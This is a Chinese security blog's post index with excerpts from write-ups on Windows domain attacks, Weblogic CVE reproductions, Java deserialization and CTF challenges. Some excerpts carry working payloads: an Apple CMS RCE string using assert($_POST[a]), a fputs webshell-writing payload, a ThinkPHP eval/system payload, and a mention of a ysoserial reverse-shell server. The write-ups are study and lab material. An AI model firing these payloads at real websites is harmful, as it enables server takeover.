自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(87)
  • 资源 (6)
  • 收藏
  • 关注

原创 MS14-068 漏洞分析—不安全的PAC

MS14-068 漏洞分析—不安全的PAC

2022-12-01 00:20:31 1

原创 浅谈windows提权

浅谈windows提权

2022-11-10 18:18:04 742

原创 白银票据/黄金票据构造分析

白银票据/黄金票据构造分析

2022-10-29 01:27:31 388

原创 NTLM与kerberos认证体系详解

NTLM与kerberos认证体系详解

2022-10-27 02:13:00 373

原创 NTLM/smb 中继攻击

NTLM/smb 中继攻击

2022-10-19 10:18:49 232

原创 zerologon漏洞分析

zerologon漏洞分析

2022-10-16 08:55:37 291

原创 SqlServer常见攻击手法

sqlserver常见渗透手法

2022-09-30 18:05:43 464

原创 yso-urldns

2022-08-08 17:43:06 35

原创 木马开发—单一实例

2022-08-08 14:28:06 37

原创 域渗透——绕过LSA保护机制总结

LSA绕过

2022-08-06 17:12:52 174

原创 jdk动态代理介绍及invoke方法自动运行的原因

jdk动态代理介绍及invoke方法自动运行的原因

2022-03-01 15:27:48 268

转载 redis攻击总结

redis的那几种攻击方式在这几年的赛题还是实战中几乎已经被玩烂了,原理也就那些东西,主要就是通信的RESP协议,所以再总结感觉也可能也学不到太多东西,所以就直接看了xq17师傅的文章感觉写的很好就直接转载了xq17师傅的文章,但是师傅这里写错了一个问题,就是redis在高版本中module load出错的原因不是exp的不规范,而是在高版本中增加了相关的权限验证,详情在https://github.com/redis/redis/pull/6257 这个commit里面注:以下内容原创来自于xq17师傅

2022-02-24 17:20:31 1073

原创 javaSec-Servlet的线程安全问题

javaSec-Servlet的线程安全问题刚开始看见关于这的知识点是在p神的知识星球看见y4师傅发的,后来又看见了vnctf用了这个知识点,就简单的写下。这里直接拿easyJava这题的题目环境当了demo:刚开始有个任意文件读取,直接读Servlet文件反编译下先看HelloWorldServlet://// Source code recreated from a .class file by IntelliJ IDEA// (powered by FernFlower decompile

2022-02-20 19:55:41 3423

原创 javaSec-rmi详解

javaSec-rmi对于rmi这从很久前就接触到了利用,原理也是只简单的了解了一些,一直没有好好的梳理过,最近正好看到了好多相关的资料,顺便写下。前置知识:RPC理解RPC可以从他的名字开始,RPC的全称是Remote Method Call,顾名思义就是远程方法调用,RPC呢他不是一个框架也不是一个协议,是一个概念性的东西,只是远程通信的一种方式,区别其他远程通信的方式,他是其中的一种,这种概念性的东西,可能从定义说起来很烦,所以我尽量从代码的方式来理解。从单机到分布式->分布式通信 :就

2022-02-12 18:50:59 402

原创 linux内网-cfs2

linux内网-cfs2苹果cms:有个rce的洞:getshell payload(a):index.php?m=vod-search&wd={if-A:assert($_POST[a])}{endif-A}fput写马,test.php 密码test:index.php?m=vod-search&wd={if-A:print(fputs%28fopen%28base64_decode%28dGVzdC5waHA%29,w%29,base64_decode%28PD9waHA

2022-02-04 20:58:56 743

原创 linux内网-cfs3

2022-01-27 16:51:30 2196

原创 Thinkphp全漏洞分析

2022-01-23 14:04:39 2523

原创 Weblogic 未认证远程命令执行(CVE-2020-14882、CVE-2020-14883)

Weblogic 未认证远程命令执行(CVE-2020-14882、CVE-2020-14883)漏洞环境:vulhub漏洞复现:CVE-2020-14882 允许远程用户绕过管理员控制台组件中的身份验证。CVE-2020-14883 允许经过身份验证的用户在管理员控制台组件上执行任何命令。使用这两个漏洞的连锁,未经身份验证的远程攻击者可以通过 HTTP 在 Oracle WebLogic 服务器上执行任意命令并完全控制主机。1.docker 开个环境:...

2021-11-04 20:42:23 3311

原创 Weblogic 常规渗透测试之利用文件读取漏洞getshell

Weblogic 常规渗透测试之利用文件读取漏洞getshell漏洞环境:vulhub复现步骤:1.起一个存在任意文件读取的demo:file,jsp存在漏洞3.读取后台用户密文与密钥文件weblogic密码使用AES(老版本3DES)加密,对称加密可解密,只需要找到用户的密文与加密时的密钥即可。这两个文件均位于base_domain下,名为SerializedSystemIni.dat和config.xml,在本环境中为./security/SerializedSystemIni.da

2021-11-04 18:37:47 2329

原创 Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)

Weblogic WLS Core Components 反序列化命令执行漏洞(CVE-2018-2628)复现环境:vulhub漏洞原因:Weblogic Server WLS Core Components中出现的一个反序列化漏洞(CVE-2018-2628),该漏洞通过t3协议触发,可导致未授权的用户在远程服务器执行任意命令。复现过程:启动一个执行反弹shell的一个JRMP Server:payload:java -cp ysoserial-master-8eb5cbfbf6-1.

2021-11-03 15:07:07 2332

原创 Weblogic < 10.3.6 ‘wls-wsat‘ XMLDecoder 反序列化漏洞(CVE-2017-10271)

Weblogic < 10.3.6 “wls-wsat” XMLDecoder 反序列化漏洞(CVE-2017-10271)复现环境:vulhub漏洞原因:Weblogic的WLS Security组件对外提供webservice服务,其中使用了XMLDecoder来解析用户传入的XML数据,在解析的过程中出现反序列化漏洞,导致可执行任意命令。详细原因:https://www.cnblogs.com/hetianlab/p/13534535.html复现过程:访问显示404,weblo

2021-11-02 18:57:30 146

原创 Weblogic 任意文件上传漏洞(CVE-2018-2894)

Weblogic 任意文件上传漏洞(CVE-2018-2894)影响版本:Oracle WebLogic Server,版本10.3.6.0,12.1.3.0,12.2.1.2,12.2.1.3。复现环境:vulhub漏洞条件:Web Service Test Page 开启。注:Web Service Test Page 在“生产模式”下默认不开启漏洞原因:Weblogic管理端未授权的两个页面存在任意上传jsp文件漏洞,进而获取服务器权限复现步骤:1,从config.do上传先登入

2021-11-01 19:52:51 499

原创 PHP绕过open_basedir

1. 命令执行函数open_basedir的设置对系统命令执行函数无效<?php$cmd="cat ../1.txt";file_get_contents($cmd);echo"file_get_contents finsh"."\n"."-----------------------"."\n";system($cmd);echo shell_exec($cmd);echo exec($cmd)."\n";passthru($cmd);$fp = popen($

2021-09-05 15:57:23 167

转载 java的命令执行与bypassRASP

关于php的webshell相信大家已经很了解了,webshell就是相当于可以控制目标服务器的一小段代码。今天讲下java的webshell以及bypassRASP。java的命令执行一般都是通过Runtime类的Runtime.getRuntime().exec()方法来执行,来看一段demo (建议练习审计时不要用docker的环境,建议idea启动):看一下执行效果:OK,这一段代码就是一个简单的webshell。接下来我们简单的看下调用链:...

2021-09-01 16:41:48 431

原创 ctfshowThinkphp

web569web570/index.php/Home/ctfshow/assert/eval($_GET[1])/?1=system("tac%20/f*");闭包路由:参考官方文档或博客web571给了源码,找到一处可以进行传参的控制器,传个参数在这,打个断点调下:接着跟进去:接着跟进:我们最开始传的参数在content变量里,跟进到if(这里有个对于当前使用的一个模板的判断,由于不知道题目使用的是哪种所以我就用0,1了图方便):往下走:成功找到后门,conten

2021-08-24 16:54:15 113

原创 tomcat弱口令

tomcat弱口令1.前置知识war包:war是一种web应用程序格式,包含了web应用程序中的所有内容。在这个文件中的所有内容将按一定的目录结构来组织,一般情况下war文件中包含了html,jsp文件或者含有这两种文件的目录。另外它里面还含有一个web-inf目录,在这个目录下存放的是应用配置文件web.xml以及classes目录,classes目录里面包含了编译好的Servlet类和Jsp或Servlet所依赖的其它类。由于war文件将所有的文件合并成一个,因此减少了文件的传输时间2.漏洞环境

2021-08-20 15:06:53 634

原创 Tomcat任意写入文件漏洞CVE-2017-12615

Tomcat任意写入文件漏洞漏洞原理:在web.xm文件中Tomcat设置了写权限(readonly=false),导致我们可以向服务器写入文件。

2021-07-23 15:07:04 118

原创 梦想cms1.4审计

梦想cms1.4审计一个简单的mvc,直接去看配置文件和控制器,配置文件中无waf:先来后台的,后台的都比较容易sql注入1BookAction.class.php文件:有传参,跟进下getReply方法:进行了字符串拼接操作,并且返回调用了父类的selectModel方法,跟进下:又调用了父类的selectDB方法,跟进下:进行了sql查询并且我们可以控制 $sqlStr变量,打印下sql语句:闭合构造下payload:...

2021-07-22 11:19:31 232

原创 java类加载器机制——3.URLClassLoader

URLClassLoader继承了ClassLoader,URLClassLoader提供了加载远程资源的能力,在写漏洞利用的payload或者webshell的时候我们可以使用这个特性来加载远程的 jar 来实现远程的类方法调用。TestURLClassLoader.java 示例:import java.io.ByteArrayOutputStream;import java.io.InputStream;import java.net.URL;import java.net.URLClass

2021-07-14 17:37:52 468

转载 java类加载器机制——2.自定义一个ClassLoader

ClassLoader一切的Java类都必须经过JVM加载后才能运行,而ClassLoader的主要作用就是Java类文件的加载。在JVM类加载器中最顶层的是Bootstrap ClassLoader(引导类加载器)、Extension ClassLoader(扩展类加载器)、App ClassLoader(系统类加载器),AppClassLoader是默认的类加载器,如果类加载时我们不指定类加载器的情况下,默认会使用AppClassLoader加载类,ClassLoader.getSystemClass

2021-07-14 17:37:18 234

原创 java类加载器机制——1.java的类加载及类加载器机制

(最开始在github上发布的,有的图片不知为啥在这打不开贴个gayhub原文地址:https://github.com/wa1ki0g/javasec)我们在学习java编程时,大概都知道java文件的执行顺序,即先编译成class文件即字节码文件,然后再移交给java虚拟机去进一步翻译执行这些文件。但是我们却不知道类加载过程的真正的细节。在jvm的启动是通过,引导类加载器(bootstrap class loade)创建加载一个初始类来完成的,jvm组成结构之一就是类装载器子系统,今天我们先从这个

2021-07-14 17:36:27 94

转载 java反射——3_反射java_lang_Runtime进行rce及一点补充

java.lang.Runtime因为有一个exec方法可以执行命令,所以在很多的payload中我们都可以看到反射调用Runtime类来执行本地系统命令,通过学习如何反射Runtime类也能让我们理解反射的一些基础用法以及一些攻击手法不使用反射执行本地命令代码片段:System.out.println(IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream(),"UTF-8"));如上可以看到,我们可以使用一行代码完成

2021-07-14 17:33:35 522

转载 java反射——2_java反射常用api

获取反射中的class对象在反射中要获取一个类或调用一个类的方法,我们首先要获取到该类的class对象在java API中,获取Class类对象有三种方法:第一种,使用Class.forName 静态方法。当你知道该类的全路径名时,你可以使用该方法获取Class类对象Class clz = Class.forName("java.lang.String");第二种,使用类的.class方法,这种方法只适合在编译前就知道操作的ClassClass clz = String.class;第三种

2021-07-14 17:32:53 98

转载 java反射——1_java的反射机制基础

J ava反射(Reflection)是Java非常重要的动态特性,通过使用反射我们不仅可以获取到任何类的成员方法(Methods)、成员变量(Fields)、构造方法(Constructors)等信息,还可以动态创建Java类实例、调用任意的类方法、修改任意的类成员变量值等。Java反射机制是Java语言的动态性的重要体现,也是Java的各种框架底层实现的灵魂。一般情况下我们使用某个类的时候,比如创建个对象或者直接引用等,都会必定知道他是什么类,是用来做什么的。于是我们可以直接对其进行实例

2021-07-14 17:31:39 36

原创 BlueCMS v1.6

BlueCMS v1.6审计大致看了下几乎都包含了common.inc.phpok,看一下这个全局配置文件:看下deep_addslashes函数就是简单重下了下addslashe函数,这里先看下Seay的自动审计结果,先不考虑利用有单双引号的SQL注入:先去ad_js.php看下:payload:view-source:http://127.0.0.1/bluecms_v1.6_sp1/uploads/ad_js.php?ad_id=1%20order%20by%207view

2021-07-12 15:12:59 599 2

原创 XCTF新手区

view_sourcef12robotsrobots.txtbackupindex.php.bakcookiedisabled_button删掉disableweak_auth写wp时候题凉了simple_php?a=a&b=12345aget_postget : a=1 post : b=2xff_refererwebshell题凉了command_execution凉了simple_jsflag在html里,进行几轮编码处理...

2021-07-11 22:02:41 37

原创 逆向分析hello,world

这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入欢迎使用Markdown编辑器你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar

2021-07-06 22:30:43 163

原创 GKCTF wp

MISC签到给了个pcapng文件,用winshark分析下,是个webshell后门的交互流量。过滤下http:随便打开一个数据包,看命令回显,是字符反转加上base64加密的。找到执行cat /fl4g | base64 命令的回显数据包。直接查看会显示truncated,直接跟踪下http流:转下字符串b64解下码再反转下,再解下b64解出来是这个字符串:把两个括号删除,把双写变成单写flag就出来了。web1 easycms打开页面是一个登录页面,给的hint密码是五位爆破下

2021-06-27 13:04:13 215

原创 CTFshow baby杯wp

baby_captcha点击无脑,会给一个字典。爆破admin firectfshowcmsindex.php里有个包含/install/index.php里是个重新安装的操作,但是有锁。这里可以用存在include的界面将这个页面包含进来。再进行重新安装。这段代码有个连接数据库的操作,我们可以用这点来构造一个恶意的mysql客户端来进行任意文件读取。原理看这:https://www.modb.pro/db/51823主要这个:恶意脚本:https://github.com/Moro

2021-06-23 23:02:32 327 1

原创 2021强网杯wp

(这次比赛做出的四个web总结下。赛后过的两天才写的wp的有好多可能没记录到,自己还比较菜,师傅们轻点喷。。)赌徒寻宝pop_mastereasyweb赌徒打开提示/etc/hint文件。源码泄露有web.zip<meta charset="utf-8"><?php//hint is in hint.phperror_reporting(1);class Start{ public $name='guest'; public $flag='sys

2021-06-15 20:18:47 1768 2

python 注入漏洞.md

攻防世界一道python注入的wp 方便学习

2020-04-03

XXE 原理漏洞详解.md

XXE原理漏洞,易懂。

2020-04-03

2020易霖博杯 web wp.md

2020易霖博杯 web wp. 参照大佬们比较好的思路写的WP 方便学习

2020-04-02

无参数 rce.md

记录一下,关于这次比赛的 wp >.&lt; 并向大佬们积极学习 >.&lt; 顺便混点分

2020-04-01

bugkctf 代码审计.md

学习的笔记,方便平时查看,bugkct代码审计的wp,可以将我自己的见解分享给大家,使大家少走点弯路

2020-04-01

物大青蛙大青蛙大全的理层.txt

自己对ctf习题做完后的总结,及时进行记录 ,来督促学习,时刻进行复习,同时也进行打卡,来记录自己的成长

2020-03-31

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除